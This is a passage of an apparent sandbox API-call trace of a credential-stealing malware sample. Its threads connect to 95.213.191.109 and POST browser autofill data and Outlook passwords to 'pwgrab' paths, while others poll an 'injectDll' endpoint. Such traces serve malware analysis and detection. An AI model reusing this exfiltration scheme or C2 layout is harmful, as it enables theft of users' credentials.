	[0219.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x31eeb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0219.776] WinHttpSetTimeouts (hInternet=0x22c4ea8, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0219.776] WinHttpOpenRequest (hConnect=0x22c5248, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27527d0
	[0219.776] WinHttpSetOption (hInternet=0x27527d0, dwOption=0x1f, lpBuffer=0x31ef228, dwBufferLength=0x4) returned 1
	[0219.776] WinHttpSendRequest (hRequest=0x27527d0, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BB7C93\r\nContent-Length: 136\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x2738790*, dwOptionalLength=0x88, dwTotalLength=0x88, dwContext=0x0) returned 1
	[0220.132] WinHttpReceiveResponse (hRequest=0x27527d0, lpReserved=0x0) returned 1
	[0220.132] WinHttpQueryHeaders (in: hRequest=0x27527d0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x31ef218, lpdwBufferLength=0x31ef214, lpdwIndex=0x0 | out: lpBuffer=0x31ef218*, lpdwBufferLength=0x31ef214*=0x4, lpdwIndex=0x0) returned 1
	[0220.132] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27381f0) returned 1
	[0220.132] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffdf8) returned 1
	[0220.132] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff948) returned 1
	[0220.132] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a64c8) returned 1
	[0220.132] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311000) returned 1
	[0220.132] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2738790) returned 1
	[0220.132] Sleep (dwMilliseconds=0xbb8) 
	[0223.160] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737cc8) returned 1
	[0223.160] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffc30) returned 1
	[0223.160] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22aa5f0) returned 1
	[0223.160] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ca0) returned 1
	[0223.160] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737c78) returned 1
	[0223.160] WinHttpCloseHandle (hInternet=0x27527d0) returned 1
	[0223.160] WinHttpCloseHandle (hInternet=0x22c5248) returned 1
	[0223.160] WinHttpCloseHandle (hInternet=0x22c4ea8) returned 1
	[0223.160] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27381c8) returned 1

Thread:
	id = 274
	os_tid = 0xd10

	[0219.777] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c57b8
	[0219.814] WinHttpConnect (hSession=0x22c57b8, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c58a0
	[0219.814] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27330e8
	[0219.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Browser passwords are empty", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28
	[0219.814] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263a28
	[0219.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Browser passwords are empty", cchWideChar=-1, lpMultiByteStr=0x263a28, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Browser passwords are empty", lpUsedDefaultChar=0x0) returned 28
	[0219.815] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777c18
	[0219.815] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad378
	[0219.815] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2d0
	[0219.815] GetTickCount () returned 0xa8d432
	[0219.815] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311420
	[0219.815] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90) returned 0x291aa8
	[0219.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x32eeb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0219.815] WinHttpSetTimeouts (hInternet=0x22c57b8, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0219.815] WinHttpOpenRequest (hConnect=0x22c58a0, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x277bc00
	[0219.815] WinHttpSetOption (hInternet=0x277bc00, dwOption=0x1f, lpBuffer=0x32ef228, dwBufferLength=0x4) returned 1
	[0219.816] WinHttpSendRequest (hRequest=0x277bc00, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BB7CB2\r\nContent-Length: 132\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x291aa8*, dwOptionalLength=0x84, dwTotalLength=0x84, dwContext=0x0) returned 1
	[0220.133] WinHttpReceiveResponse (hRequest=0x277bc00, lpReserved=0x0) returned 1
	[0220.133] WinHttpQueryHeaders (in: hRequest=0x277bc00, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x32ef218, lpdwBufferLength=0x32ef214, lpdwIndex=0x0 | out: lpBuffer=0x32ef218*, lpdwBufferLength=0x32ef214*=0x4, lpdwIndex=0x0) returned 1
	[0220.133] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777c18) returned 1
	[0220.133] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad378) returned 1
	[0220.133] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2d0) returned 1
	[0220.133] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263a28) returned 1
	[0220.133] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311420) returned 1
	[0220.133] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x291aa8) returned 1
	[0220.133] Sleep (dwMilliseconds=0xbb8) 
	[0223.161] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2738380) returned 1
	[0223.161] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffeb8) returned 1
	[0223.161] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c71a0) returned 1
	[0223.161] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2738358) returned 1
	[0223.161] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2738330) returned 1
	[0223.161] WinHttpCloseHandle (hInternet=0x277bc00) returned 1
	[0223.161] WinHttpCloseHandle (hInternet=0x22c58a0) returned 1
	[0223.161] WinHttpCloseHandle (hInternet=0x22c57b8) returned 1
	[0223.161] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27330e8) returned 1

Thread:
	id = 277
	os_tid = 0xd2c

	[0222.256] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5c40
	[0222.256] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0222.256] WinHttpConnect (hSession=0x22c5c40, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5d28
	[0222.257] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27780f0
	[0222.257] WinHttpSetTimeouts (hInternet=0x22c5c40, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0222.257] WinHttpOpenRequest (hConnect=0x22c5d28, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x26ae990
	[0222.257] WinHttpSetOption (hInternet=0x26ae990, dwOption=0x1f, lpBuffer=0x33ef234, dwBufferLength=0x4) returned 1
	[0222.257] WinHttpSendRequest (hRequest=0x26ae990, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0222.686] WinHttpReceiveResponse (hRequest=0x26ae990, lpReserved=0x0) returned 1
	[0222.686] WinHttpQueryHeaders (in: hRequest=0x26ae990, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x33ef224, lpdwBufferLength=0x33ef220, lpdwIndex=0x0 | out: lpBuffer=0x33ef224*, lpdwBufferLength=0x33ef220*=0x4, lpdwIndex=0x0) returned 1
	[0222.686] Sleep (dwMilliseconds=0xbb8) 
	[0225.686] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778000) returned 1
	[0225.686] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d0d0) returned 1
	[0225.686] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fd8) returned 1
	[0225.686] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0225.686] WinHttpCloseHandle (hInternet=0x26ae990) returned 1
	[0225.687] WinHttpCloseHandle (hInternet=0x22c5d28) returned 1
	[0225.687] WinHttpCloseHandle (hInternet=0x22c5c40) returned 1
	[0225.687] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27780f0) returned 1

Thread:
	id = 278
	os_tid = 0x658

	[0222.747] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c56d0
	[0222.748] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0222.748] WinHttpConnect (hSession=0x22c56d0, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5160
	[0222.748] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737ef8
	[0222.748] WinHttpSetTimeouts (hInternet=0x22c56d0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0222.748] WinHttpOpenRequest (hConnect=0x22c5160, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x271f00
	[0222.749] WinHttpSetOption (hInternet=0x271f00, dwOption=0x1f, lpBuffer=0x268f234, dwBufferLength=0x4) returned 1
	[0222.749] WinHttpSendRequest (hRequest=0x271f00, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0223.064] WinHttpReceiveResponse (hRequest=0x271f00, lpReserved=0x0) returned 1
	[0223.064] WinHttpQueryHeaders (in: hRequest=0x271f00, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x268f224, lpdwBufferLength=0x268f220, lpdwIndex=0x0 | out: lpBuffer=0x268f224*, lpdwBufferLength=0x268f220*=0x4, lpdwIndex=0x0) returned 1
	[0223.064] Sleep (dwMilliseconds=0xbb8) 
	[0226.139] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0226.139] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffd80) returned 1
	[0226.139] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737e80) returned 1
	[0226.139] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737f48) returned 1
	[0226.139] WinHttpCloseHandle (hInternet=0x271f00) returned 1
	[0226.139] WinHttpCloseHandle (hInternet=0x22c5160) returned 1
	[0226.139] WinHttpCloseHandle (hInternet=0x22c56d0) returned 1
	[0226.139] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ef8) returned 1

Thread:
	id = 279
	os_tid = 0x810

	[0223.162] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c57b8
	[0223.162] lstrcmpiW (lpString1="DPST", lpString2="SINJ") returned -1
	[0223.162] WinHttpConnect (hSession=0x22c57b8, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c58a0
	[0223.162] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777d30
	[0223.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Successfully sent autofill data to DPost server: Chrome", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56
	[0223.163] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c71a0
	[0223.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Successfully sent autofill data to DPost server: Chrome", cchWideChar=-1, lpMultiByteStr=0x22c71a0, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Successfully sent autofill data to DPost server: Chrome", lpUsedDefaultChar=0x0) returned 56
	[0223.163] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c73e0
	[0223.163] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22acdc0
	[0223.163] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22acf58
	[0223.163] GetTickCount () returned 0xa8e14c
	[0223.163] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311420
	[0223.163] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xb0) returned 0x227bb08
	[0223.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x2d8eb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0223.163] WinHttpSetTimeouts (hInternet=0x22c57b8, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0223.163] WinHttpOpenRequest (hConnect=0x22c58a0, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x26e438
	[0223.163] WinHttpSetOption (hInternet=0x26e438, dwOption=0x1f, lpBuffer=0x2d8f228, dwBufferLength=0x4) returned 1
	[0223.163] WinHttpSendRequest (hRequest=0x26e438, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BB89CC\r\nContent-Length: 160\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x227bb08*, dwOptionalLength=0xa0, dwTotalLength=0xa0, dwContext=0x0) returned 1
	[0223.869] WinHttpReceiveResponse (hRequest=0x26e438, lpReserved=0x0) returned 1
	[0223.869] WinHttpQueryHeaders (in: hRequest=0x26e438, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x2d8f218, lpdwBufferLength=0x2d8f214, lpdwIndex=0x0 | out: lpBuffer=0x2d8f218*, lpdwBufferLength=0x2d8f214*=0x4, lpdwIndex=0x0) returned 1
	[0223.869] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c73e0) returned 1
	[0223.869] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22acdc0) returned 1
	[0223.869] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22acf58) returned 1
	[0223.869] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c71a0) returned 1
	[0223.869] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311420) returned 1
	[0223.869] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x227bb08) returned 1
	[0223.869] Sleep (dwMilliseconds=0xbb8) 
	[0227.076] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2738010) returned 1
	[0227.076] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff930) returned 1
	[0227.076] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225c10) returned 1
	[0227.076] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fe8) returned 1
	[0227.076] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0227.076] WinHttpCloseHandle (hInternet=0x26e438) returned 1
	[0227.076] WinHttpCloseHandle (hInternet=0x22c58a0) returned 1
	[0227.076] WinHttpCloseHandle (hInternet=0x22c57b8) returned 1
	[0227.076] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777d30) returned 1

Thread:
	id = 280
	os_tid = 0xd34

	[0223.210] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c4ea8
	[0223.210] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0223.210] WinHttpConnect (hSession=0x22c4ea8, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5248
	[0223.210] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778280
	[0223.210] WinHttpSetTimeouts (hInternet=0x22c4ea8, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0223.210] WinHttpOpenRequest (hConnect=0x22c5248, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x26b64b0
	[0223.210] WinHttpSetOption (hInternet=0x26b64b0, dwOption=0x1f, lpBuffer=0x2edf234, dwBufferLength=0x4) returned 1
	[0223.210] WinHttpSendRequest (hRequest=0x26b64b0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0223.812] WinHttpReceiveResponse (hRequest=0x26b64b0, lpReserved=0x0) returned 1
	[0223.812] WinHttpQueryHeaders (in: hRequest=0x26b64b0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x2edf224, lpdwBufferLength=0x2edf220, lpdwIndex=0x0 | out: lpBuffer=0x2edf224*, lpdwBufferLength=0x2edf220*=0x4, lpdwIndex=0x0) returned 1
	[0223.812] Sleep (dwMilliseconds=0xbb8) 
	[0226.997] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777cb8) returned 1
	[0226.997] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff5d0) returned 1
	[0226.997] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777c90) returned 1
	[0226.997] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777c68) returned 1
	[0226.997] WinHttpCloseHandle (hInternet=0x26b64b0) returned 1
	[0226.998] WinHttpCloseHandle (hInternet=0x22c5248) returned 1
	[0226.998] WinHttpCloseHandle (hInternet=0x22c4ea8) returned 1
	[0226.998] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778280) returned 1

Thread:
	id = 281
	os_tid = 0xb84

	[0223.694] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5418
	[0223.694] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0223.694] WinHttpConnect (hSession=0x22c5418, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5078
	[0223.694] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778500
	[0223.694] WinHttpSetTimeouts (hInternet=0x22c5418, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0223.695] WinHttpOpenRequest (hConnect=0x22c5078, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x26cdc48
	[0223.695] WinHttpSetOption (hInternet=0x26cdc48, dwOption=0x1f, lpBuffer=0x31ef234, dwBufferLength=0x4) returned 1
	[0223.695] WinHttpSendRequest (hRequest=0x26cdc48, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0224.173] WinHttpReceiveResponse (hRequest=0x26cdc48, lpReserved=0x0) returned 1
	[0224.174] WinHttpQueryHeaders (in: hRequest=0x26cdc48, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x31ef224, lpdwBufferLength=0x31ef220, lpdwIndex=0x0 | out: lpBuffer=0x31ef224*, lpdwBufferLength=0x31ef220*=0x4, lpdwIndex=0x0) returned 1
	[0224.174] Sleep (dwMilliseconds=0xbb8) 
	[0227.387] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778410) returned 1
	[0227.387] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fff30) returned 1
	[0227.387] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783e8) returned 1
	[0227.387] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0227.387] WinHttpCloseHandle (hInternet=0x26cdc48) returned 1
	[0227.387] WinHttpCloseHandle (hInternet=0x22c5078) returned 1
	[0227.387] WinHttpCloseHandle (hInternet=0x22c5418) returned 1
	[0227.387] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778500) returned 1

Thread:
	id = 282
	os_tid = 0xb88

	[0223.951] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5500
	[0223.952] lstrcmpiW (lpString1="DPST", lpString2="SINJ") returned -1
	[0223.952] WinHttpConnect (hSession=0x22c5500, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c55e8
	[0223.952] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778780
	[0223.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Successfully sent PASSWORDS to DPost server: Outlook passwords", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63
	[0223.952] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c7278
	[0223.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Successfully sent PASSWORDS to DPost server: Outlook passwords", cchWideChar=-1, lpMultiByteStr=0x22c7278, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Successfully sent PASSWORDS to DPost server: Outlook passwords", lpUsedDefaultChar=0x0) returned 63
	[0223.953] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c6f18
	[0223.953] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7608
	[0223.953] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7620
	[0223.953] GetTickCount () returned 0xa8e458
	[0223.953] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311420
	[0223.953] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xb0) returned 0x227bb08
	[0223.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x32eeb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0223.953] WinHttpSetTimeouts (hInternet=0x22c5500, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0223.953] WinHttpOpenRequest (hConnect=0x22c55e8, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24d5b0
	[0223.953] WinHttpSetOption (hInternet=0x24d5b0, dwOption=0x1f, lpBuffer=0x32ef228, dwBufferLength=0x4) returned 1
	[0223.953] WinHttpSendRequest (hRequest=0x24d5b0, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BB8CD8\r\nContent-Length: 167\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x227bb08*, dwOptionalLength=0xa7, dwTotalLength=0xa7, dwContext=0x0) returned 1
	[0224.640] WinHttpReceiveResponse (hRequest=0x24d5b0, lpReserved=0x0) returned 1
	[0224.640] WinHttpQueryHeaders (in: hRequest=0x24d5b0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x32ef218, lpdwBufferLength=0x32ef214, lpdwIndex=0x0 | out: lpBuffer=0x32ef218*, lpdwBufferLength=0x32ef214*=0x4, lpdwIndex=0x0) returned 1
	[0224.640] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c6f18) returned 1
	[0224.640] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7608) returned 1
	[0224.640] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7620) returned 1
	[0224.640] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c7278) returned 1
	[0224.640] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311420) returned 1
